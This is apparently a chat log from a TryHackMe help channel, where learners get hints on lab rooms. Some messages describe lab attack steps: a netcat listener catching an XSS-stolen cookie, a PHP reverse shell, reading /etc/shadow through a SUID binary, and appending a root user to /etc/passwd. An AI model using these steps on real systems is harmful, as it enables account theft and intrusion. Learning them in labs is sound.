haughty axle
#

Then try it buh u should unzip it as root

#

Good night y'all

#

Just wanna take a one hour break

verbal kayak
#

that was my problem

#

thank you

haughty axle
#

Alright

jolly crescent
#

Hello everyone, I'm in room Windows Internals, task 5. Has anyone done it? Please

thorny bluff
#

gotta unzip it

verbal kayak
#

yeah I have never worked with a gz file before and ho idea I had to use gzip. Much appreciated.

verbal kayak
#

Yeah got it working and finished the room

jolly crescent
old dew
wise kiln
#

@Kiru#5962

fossil ridge
#

Hi

#

im attempting the Networking room and am stuck on a question

#

"What kind of Protocol is TCP?"

#

I have done all of the other questions and find myself stuck on this one, i've re read the whole section again and again and tried researching it

lucid junco
#

Transport layer?

fossil ridge
#

no

lucid junco
#

What is the room url?

fossil ridge
lucid junco
#

Which task?

fossil ridge
#

TCP Model

#

4

lucid junco
#

Yeah.

#

The answer is in the text.

#

Have a read again.

fossil ridge
#

ive read the text over and over

lucid junco
#

IF you're stuck

#

Use this.

wise kiln
#

@! Kiru

slate knot
#

@wise kiln

#

hi

boreal quiver
#

Any help with Cross-site Scripting Room https://tryhackme.com/romm/xssgi will be appreciated. What is meant by "staff-session cookie". I can get a cookie but it's not the right one as it's for the ticket I just created. TIA

left thunder
acoustic helm
#

Hi, not sure how to report this but i think the Wireshark101 room is wrong?

left thunder
#

If you don't receive it after 1 - 2 mins and you sure your payload is working (like you verified by receiving your own session cookie), restart the target machine

boreal quiver
#

@left thunder Thank you! I think that room could have been clearer. What you are saying makes perfect sense. Thanks again!

green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
green minnowBOT
#

Gave +1 Rep to @left thunder

boreal quiver
#

@left thunder By "restart the target machine", do you mean "Terminate" the current target machine and "Start" a new target machine?

boreal quiver
#

@left thunder Thanks... OK, I am going to do this 3 more times then I am giving up on this room and moving on. Once I got my ticket cookie because I didn't know any better. Now for the past 2 times I have not gotten any cookie including my ticket cookie. I copied and pasted the payload from the room replacing {URL_OR_IP} with my local machine's IP (I am using the VPN) and in a terminal window i have nc -nlvp 9001 listening on any 9001. Wish me lucj!

green minnowBOT
#

Gave +1 Rep to @left thunder

boreal quiver
#

@left thunder i meant my local machine's IP:9001

left thunder
#

Could you copy paste it so that I can see?

boreal quiver
#

@left thunder Hold on as it will take me a few minutes to transfer from my Kali to Windows here.

left thunder
boreal quiver
#

yes that's the IP of my Kali Machine where all of this is running

left thunder
#

Well you have to use your tun0 IP, the target machine can't reach you with that IP

#

Is the VPN running directly inside your kali VM or on your windows host?

boreal quiver
#

VPN on Kali VM

left thunder
#

Okay, then check ip a s and use your tun0 IP

#

Also make sure there is only a tun0 interface and not any extra like tun1, tun2 etc.

boreal quiver
#

yup.. if config shows just tun0 not tun1, etc

#

ok!!!! let me try THAT!

#

curious what does ip a s show?

left thunder
#

Enter it and you'll see. ifconfig is deprecated

boreal quiver
#

ahhhh thanks!

#

its colorful too! πŸ™‚

#

ok... waiting a minute or two... the suspense builds

left thunder
#

You might have to restart the target machine again, since you used some bad payloads with a wrong IP, but maybe it still works, this machine is a bit finicky

boreal quiver
#

ok but it makes sense to use the tun0 address

left thunder
#

Certainly, yes πŸ˜„

boreal quiver
#

duhh πŸ™‚

#

got a message in the VPN window... HMAC authentication failed

#

i think I am just going to move on... I've wasted too much time in this room... and I have learned a little bit about networking

#

thanks for your help though!!

boreal quiver
#

@left thunder BTW. I finally completed the room using Attack Box and your suggestions. VPN kept giving me HMAC Authorization Errors. I left some constructive suggestions on how to improve the room.

jolly crescent
#

People ignored my question :(

#

Windows Internals
Task 5
Question 4

amber sail
hasty cliff
# left thunder But again I don't see 2 new lines at the end

Hey, I know that the problem from Lemur already been solved. But I just realize that if I only put one line at the end of the header request the flag won't appear.. instead we should add 2 lines.. maybe you can add it to the room hint.. thanks

green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
# hasty cliff Hey, I know that the problem from Lemur already been solved. But I just realize ...

I'm not the room creator nor be able to edit anything, but I would say that is nothing to add as a room hint. For once because the room is showing you to add the extra header in the header tab instead of the request tab iteself. And secondly, if there are 2 empty lines in the original request but you are altering the request so that there is only 1 empty line left, that's not an issue of the room. πŸ™‚

wise kiln
slate knot
winged harbor
#

I can't seem to find the password, to deploy the machine for the vulnversity room.

#

Can someone please help out?

left thunder
winged harbor
#

Thanks. I assumed we had to ssh tryhackme@ and then start off

placid axle
#

anybody had the problem where you start a machine and it runs, but mozilla is not connecting to any website?

lucid junco
#

Are you using the attackbox?

lucid junco
jolly crescent
inner forge
#

Hi there,

How do I login to attacktive backup username

I have tried the following combo in RDP and it is not working for me:

ATTACKTIVEDRECackup

SPOOKYSECackup

.backup

backup2517860

white salmon
#

hey, I transferred the executable which is present in this room https://tryhackme.com/room/brainstorm to the machine which is available in this room https://tryhackme.com/room/bufferoverflowprep and still, I am getting this error (also it is not running properly in the immunity debugger)

primal idol
stuck fractal
forest oriole
#

Tryhackme/room/contentdiscovery , task 3 (manual discovery -favicon) I am trying to download favicon using (curl (site url) | md5sum. But nothing is downloading it keep running stats with time

forest oriole
#

Yes But hash is different

lucid junco
#

What is the syntax you enter?

forest oriole
lucid junco
#

Your URL is wrong.

lucid junco
#

So it becomes.

forest oriole
#

Ohhh ok. I was using wrong url

#

Got it 😊😊. Thank you ❀️

lucid junco
#

No worries! Happy Hacking!

forest oriole
#

✌️❀️

#

Last thing please

lucid junco
#

Yeah?

forest oriole
#

My machine has a 10.10.9.141 IP machine that is active. But when I click on the link to access website (Acme IT Support website) It failed to load.

#

I tried with https and http both. But the site is inaccessible.

lucid junco
#

Are you still on Content Discovery?

forest oriole
#

Manual Discovery - Framework Stack

#

Task 6

lucid junco
#

You're a free user on the Attackbox?

forest oriole
#

Yes

lucid junco
#

You won't be able to do it as you won't have an internet connection.

#

If possible, I suggest you use a VM.

forest oriole
#

I also have kali linux in vmware workstation

lucid junco
#

Use that. πŸ™‚

you just need to download the VPN script.

forest oriole
#

But how it can resolve it

lucid junco
#

you can't on the attackbox unless you're a sub.

forest oriole
#

Ohh okay okay. OpenVPN script

#

What to do after downloading script

lucid junco
#

You need to run it with
sudo path/to/file

alpine kestrel
#

sudo openvpn /path/to/file.ovpn

lucid junco
#

So, repeating what I just said, lol.

alpine kestrel
#

no you missed the openvpn part of the command

lucid junco
#

No, because it's part of the file...

#

It's not like it's missed out.

alpine kestrel
#
$ sudo ./shadowabsorber.ovpn                                                              
[sudo] password for sam_tunder: 
sudo: ./shadowabsorber.ovpn: command not found
#
Tue Apr  5 16:54:49 2022 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Mar 22 2022
Tue Apr  5 16:54:49 2022 library versions: OpenSSL 1.1.1f  31 Mar 2020, LZO 2.10
Tue Apr  5 16:54:49 2022 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
Tue Apr  5 16:54:49 2022 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
#

very different

forest oriole
#

Command worked using (sudo openvpn /filename)

lucid junco
#

Looks to me like it's part of the file...

alpine kestrel
#

yeah the .ovpn file extension yes... but not the openvpn part of the command

lucid junco
#

Either way, they still got it.

alpine kestrel
#

true

lucid junco
#

Still rude.

forest oriole
#

It's just loading. Is it okay?

alpine kestrel
#

hopefully the room shadow linked will help a lot too

lucid junco
alpine kestrel
#

sorry then @lucid junco

lucid junco
#

when you see that it worked, you now need to leave it like that, just minimize the window.

lucid junco
alpine kestrel
#

and to close the connection when you are done use ctrl + C

lucid junco
#

But you will need to open it every time you want to connect to the THM machines.

forest oriole
#

But it's not done yet.

#

And Says TLS handshake failed

#

Process restarting

#

I have a firewall configured in my network.

#

Process restarting due to firewall?

#

It stuck at UDP link remote: [AF_INET]3.7.33.194:1194

alpine kestrel
#

yeah the firewall could be a problem

forest oriole
#

πŸ™

#

Can't i use a VPN to bypass the firewall and then try again?

lucid junco
#

No, is it your computer?

forest oriole
#

Yeah

#

But not the whole network.

#

It's BYOD. And I am using my office network.

lucid junco
#

You could speak to you ICT team, ask them if they can open up port 443 ( I think it's that one) so you can use OpenVPN.

#

If they say no, there is nothing we can do.

forest oriole
#

I am sure they are not gonna allow me here . So simply i can use my phone carrier internet using hotspot. It may work.

lucid junco
#

That could work, yes

forest oriole
#

Everything is working well now. Thank you for your support and helping me to figure it out. ❀️😊

alpine kestrel
#

no problem... enjoy your learning potential

forest oriole
#

Once again thanks to both of you guys ☺️ Scrubz and Shadow.

toxic summit
#

So I am losing my mind with Burp Suite

#

Whenever I use 'http://machine_ip/" I get this:

#

I can't upload the image but it says "ERROR: unknown host'

#

No matter whether I use the AttackBox, Kali or WIndows.

fading robin
toxic summit
fading robin
toxic summit
#

I did. Hold up. Let me go back to my computer.

#

The machines are booting

toxic summit
#

Room finished!

#

Praise the sun!

spark geyser
#

In the gatekeeper room, the gatekeeper.exe doesn't appear to be vulnerable to buffer overflow. Is it exploitable but I'm just messing it up?

fossil ridge
#

Hi

#

I need some help with the startup room

#

Basically some spoilers ||theres a web on http that says its being built with ftp and ssh open, and i've found an address with /files/ and it has a meme .png file in it in which i looked at with steganography but nothing found, and a notice with a user called maya in which i am trying to find if this user is registered in the ftp or ssh server||

#

|| But, while trying to log in of course ftp nor ssh tells me if the user is registered so i cant really try to brute force it and now i'm stuck at this stage||

#

||Theres a hint that says "FTP and HTTP. What could possibly go wrong?"||

lucid junco
#

What is the room URL?

fossil ridge
#

||Well, Apparently, You can log into FTP as anonymous so that was my goof, looking through some more stuff now||

#

||Never mind, The /files/ address on the website replicates the ftp server and theres an ftp directory which wont let me in both website and terminal||

#

Wheres the location for php reverse shells in kali linux? Or will I have to find some on github

#

Nvm got one from pentestmonkey

#

ah thank you

#

||I've done it! With a php reverse shell and now its time to priv esc||

white salmon
#

I'm having a hard time understanding what's going on, here. I guess there's a firewall...

#

it says the scripts were ran but no info returned
this is in the Kenobi room

oblique mantle
umbral umbra
white salmon
#

i'm not sure why the scripts aren't working correctly

#

idk why I have so much trouble with nmap, lol

umbral umbra
#

are you on attackbox, or your kali vm?

white salmon
#

on my own vm

#

but tried it from my host as well

umbral umbra
#

are you on the VPN?

white salmon
#

yes. I'm connected

fading nimbus
white salmon
#

i'm confused to what the problem is. I've never had a script not return anything

fallow onyx
#

hi everyone
im trying to use bloodhound to help enumerate the network
when importing the loot.zip file - keep getting a BAD JSON FILE error
would love some help on how to fix this

umbral umbra
umbral umbra
umbral umbra
#

can you show me a screenshot of ip a @white salmon ?

white salmon
#

idk why it has multiple tunnels. Probably because I had to reconnect a few times

umbral umbra
#

and curl 10.10.10.10/whoami

#

that actually is likely the problem

#

you have multiple VPN connections open

#

ps aux | grep openvpn

white salmon
#

no response for curl/whoami

umbral umbra
#

and the ps command please

white salmon
#

hangup

#

i might just have to restart my computer

umbral umbra
#

Yeah, you have all the VPNs open.

#

You need to kill them all

#

killall openvpn

white salmon
green minnowBOT
#

Gave +1 Rep to @umbral umbra

white salmon
#

Im trying to get the SEQ number of packet 62 (Snort challenges 1 room, Task 2 Question 4) and i think im using the -n tag correctly as I ansered the previous questions using it. But it is just not taking my answer now

#

'-n 62' seems like it should work.. i mean the sequence nunbers seem to all be the same anyway. I dont understand how i can be getting it so wrong.

#

Ah maybe i was checking the alert files as opposed to the log file..

#

Nope. Still no luck. Sorry for spam everyone..

#

I figured it out lol

warm stag
#

Metasploit exploitation Meterpreter -- I cannot get meterpreter prompt from the attackbox, any ideas?

left thunder
#

Then send a screenshot of your module options

#

!docs verify

proud scarabBOT
white salmon
cedar anvil
visual pebble
#

Hi all, im working my way though the https://tryhackme.com/room/ccpentesting room and I'm a bit stuck on the SQL injection section, I've found the db name, and I can print the tables, but instead of having fields and values, they are just blank. Here is my input to the console sqlmap -u http://10.10.220.250 --forms -D tests --dump

white salmon
grave dagger
#

Working on the https://tryhackme.com/room/linprivesc room and I'm stuck on the SUID privilege escalation section. I believe I found the vulnerable ****64 binary with the "s" bit set, but I'm unsure as to how I can abuse it to maintain root privileges.

white salmon
grave dagger
cedar anvil
white salmon
green minnowBOT
#

Gave +1 Rep to @cedar anvil

grave dagger
alpine kestrel
#

that binary lets you ||read arbitery files|| which gives you access to root account

grave dagger
#

πŸ‘ on my way to figuring out that password with|| john||!

grave dagger
#

Still working on the https://tryhackme.com/room/linprivesc room and stuck on the SUID section. I abused the vulnerable binary to read the /etc/shadow and /etc/passwd files, unshadow them, and cracked the passwords for user2 and gerryconway users. While I was able to answer the 2nd question in this section, I'm still confused on how I'll be able to get read-access for flag3.txt.

Was there another vulnerable binary that I missed? I tried using the same ****64 binary to read the file, but I was still denied access. I could use a nudge in the right direction.

alpine kestrel
grave dagger
#

Perhaps the full path is causing an issue?

alpine kestrel
#

what user are you running the command as???

grave dagger
#

user2

alpine kestrel
#

hmmmm

#

going to launch the machine and test it themselves to see

#

in the mean time a good idea might be for you to verify your discord so you can share screenshots

#

!docs verify

proud scarabBOT
alpine kestrel
#

shadow thinks you made it not work because of the ./ before the command

grave dagger
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

no problem

white salmon
#

Hi. I think there is a mistake in Task 7 of room: windows internals. I executed the .exe file and wrote the flag but it is said that it is not right.

#

Please help!!

grave dagger
#

Working on https://tryhackme.com/room/linprivesc and I'm stuck on the Cron Jobs section. I've modified the existing backup.sh file and created the previously deleted /tmp/test.py file and haven't received a shell yet.

Is it something with my syntax? Or do I need to use Python through Bash in backup.sh?

grave dagger
green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
#

Happens πŸ˜„

alpine kestrel
#

have made that mistake to many times

grave dagger
#

This is just a general question. Is it possible to add a user to the /etc/passwd file with echo?

Every time I attempt this, it spits out this weird KYkKmueqNX/ string as if my command was edited as it was executed. Then I look in the /etc/passwd file and the password I tried to enter is replaced by a single /.

I understand that this isn't required for the particular section I'm in, but I remember it being discussed in a previous one and I wanted to try it out.

I'm trying to do this in https://tryhackme.com/room/linprivesc on the Cron Jobs machine.

#

I also escalated to root before trying this so it shouldn't be an issue of privilege

umbral umbra
grave dagger
#

Or maybe echo caused some sort of issue? Idk, I'll have to do more research into /passwd and /shadow like you said

raw grove
#

@grave dagger i was curious about that too, didn't try that method, but remember that snippet in the instructions ... from your other screenshot, looks like no escape or quoted characters in that string, with the special chars in the hash, bash (or sh ) will interpret a lot as something it's trying to process... you could write just that line to a file by itself, then cat my-new-user >> /etc/passwd ... otherwise you'll need quotes, backslashes, etc to escape all the special chars in the hash I think

mental wind
#

Someone on ollie?

left thunder
left thunder
grave dagger
#

I always forget about special characters

white salmon
#

Hi. I think there is a mistake in Task 7 of room: windows internals. I executed the .exe file and wrote the flag but it is said that it is not right.
Please help!!

lucid junco
white salmon
#

that is the flag I am entering: THM{1Nj3c7_4IL_7H3_7h1NG2}

lucid junco
#

I've helped you in #room-help (This is an example of keeping to one channel) Sorry for minimodding

fringe mist
#

-I am trying to do the Burp Suite room and I am in the Sequencer portion of the room. When I send a GET request that generates a cookie from my web browser to the sequencer; it doesn't create any tokens.
-I put this same request in the repeater to see what would happen and the response doesn't set a cookie, it gives me a "400 Bad Request" status.

Why is the response status changing from a "200 OK" in the HTTP History tab to a "400" in the repeater/sequencer?

bright anchor
#

hello - can anyone help me with room Splunk2g where it's asking for Amber Turing's personal e-mail address?

#

like is it somewhere in the 4 events you get from this search query:index="botsv2" sourcetype="stream:smtp" aturing@froth.ly berkbeer

#

oh snap...never mind, I actually found it 😞

bright anchor
#

ok now I'm stuck on this question:
What SQL function is being abused on the URI path from the previous question?

thorny bluff
#

can i get some help on wonderland

#

how do i exploit walrus_and_the_carpenter.py

#

I tried libaray hijacking but randon .py is not writable

#

and cant change the priority

umbral umbra
#

Is this an issue of climate change, @burnt rivet ?

thorny bluff
#

I tried harder πŸ‘

ornate glen
#

somebody please help me 😦

#

im absolutely going insane here

raw grove
ornate glen
#

trying to get a metasploit shell on a pivoted windows pc (PCFILESRV01)

knotty stirrup
#

Hey, im doing the Cyborg CTF, and im stuck on not knowing what to do. I have just a bunch of encrypted things however no clue what to do with them as 1 is sha256. others seem to be MySQL323 or LM. But no Database. Im basiclly lost. I've found multiple things such as the directory to /squid/passwd and /squid/squid.conf. Not only that I have the final archive with a bunch of files that just completely confuse me such as the config text file. ID? and Key?(The ID is a hashed SHA256 but what is the key?) Am I going in the right direction? I have no idea what to do next

#

I just don't understand these files

exotic geyser
#

hey all. wondering if anyone can point me in the right direction...

currently in Attacktive Directory.
in task 5, abusing Kerberos,

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
I haven't got a clue which one I am supposed to do?

white salmon
#

how do i select a process

#

Locate the process that is running on the deployed instance (10.10.214.66). What flag is given?

#

i found the tryhack+ process running

#

but how do i see the flag?

last nova
#

on linux: ps aux
on windows: powershell -c Get-Process

alpine kestrel
white salmon
alpine kestrel
last nova
#

What flag is given
are you looking for the program flags, or a THM{SUFDISIFDSOFSADOJIFJOSDF} flag?

alpine kestrel
#

sometimes the hard way is easy

last nova
#

there is a very important difference.

exotic geyser
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

last nova
exotic geyser
last nova
#

give the page a refresh

alpine kestrel
#

searching for ||$krb5asrep$23$|| will send you to a number on that page which is the correct answer

white salmon
last nova
alpine kestrel
white salmon
#

oh lol

#

sry

white salmon
last nova
#

in the ps aux output.

white salmon
#

it isnt

exotic geyser
alpine kestrel
white salmon
#

how am i meant to know which process it is

#

the question could be a bit more helpful.

alpine kestrel
last nova
#

I just deployed the machine; the process is very obvious.

exotic geyser
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
last nova
alpine kestrel
white salmon
#

of

#

oh

#

found it

#

thanks

alpine kestrel
#

good job

white stag
#

Can you help me with ollie box?

lucid junco
random wraith
#

Hey guys in conti ransomware room

#

What is the CVEs format in the last question ?

dusk tapir
#

hi can somebody help me with nmap in vulnversity

#

im using nmap -sV 10.10.108.73

#

but im getting more open ports and no squid proxy

tall vale
#

i just got it with nmap -Pn -sV -T4 -A ipaddress

#

pretty sure it was the -A

dusk tapir
#

ill try it now

#

thanks

tall vale
#

ya, i got all that i needed for the q's with that..

toxic summit
#

So I am stuck on the Authentication Bypass room

#

How do I save the results_

#

*?

#

I did the ffuf command, got no errors and that's it.

idle flume
#

-o in ffuf iirc

toxic summit
#

I'll try it out. Thanks!

onyx plank
lucid junco
#

Right click on the speech bubble.

onyx plank
lucid junco
#

There you go.

#

Very top one.

#

After open.

onyx plank
#

thank you

lucid junco
#

This is Windows Fundamentals 1?

onyx plank
#

yeah even though i believe I have enough knowledge about windows I still want to complete it so I can complete pre security path

winged ocean
#

in the passiverecon room in task 6 the question : Based on Shodan.io, what is the 3rd most common port used for nginx? i think the shodan.io database always changing so i can't get the right answer

#

any suggetions or helps?

lucid junco
vague pine
winged ocean
vague pine
#

Yes, they are still the same.

winged ocean
#

are they the same in shodan.io and in the room?

vague pine
#

Yes.

winged ocean
#

i cant get it so what is the problem ?

#

i just get 3 ports in shodn and the third one is 9090

tranquil parcel
lucid junco
#

The third one for me is not 9090, and it's the right answer.

#

9090 for me isn't even in the top 10.

winged ocean
#

i aswered 9090 but it say its wrong

lucid junco
#

Because it is...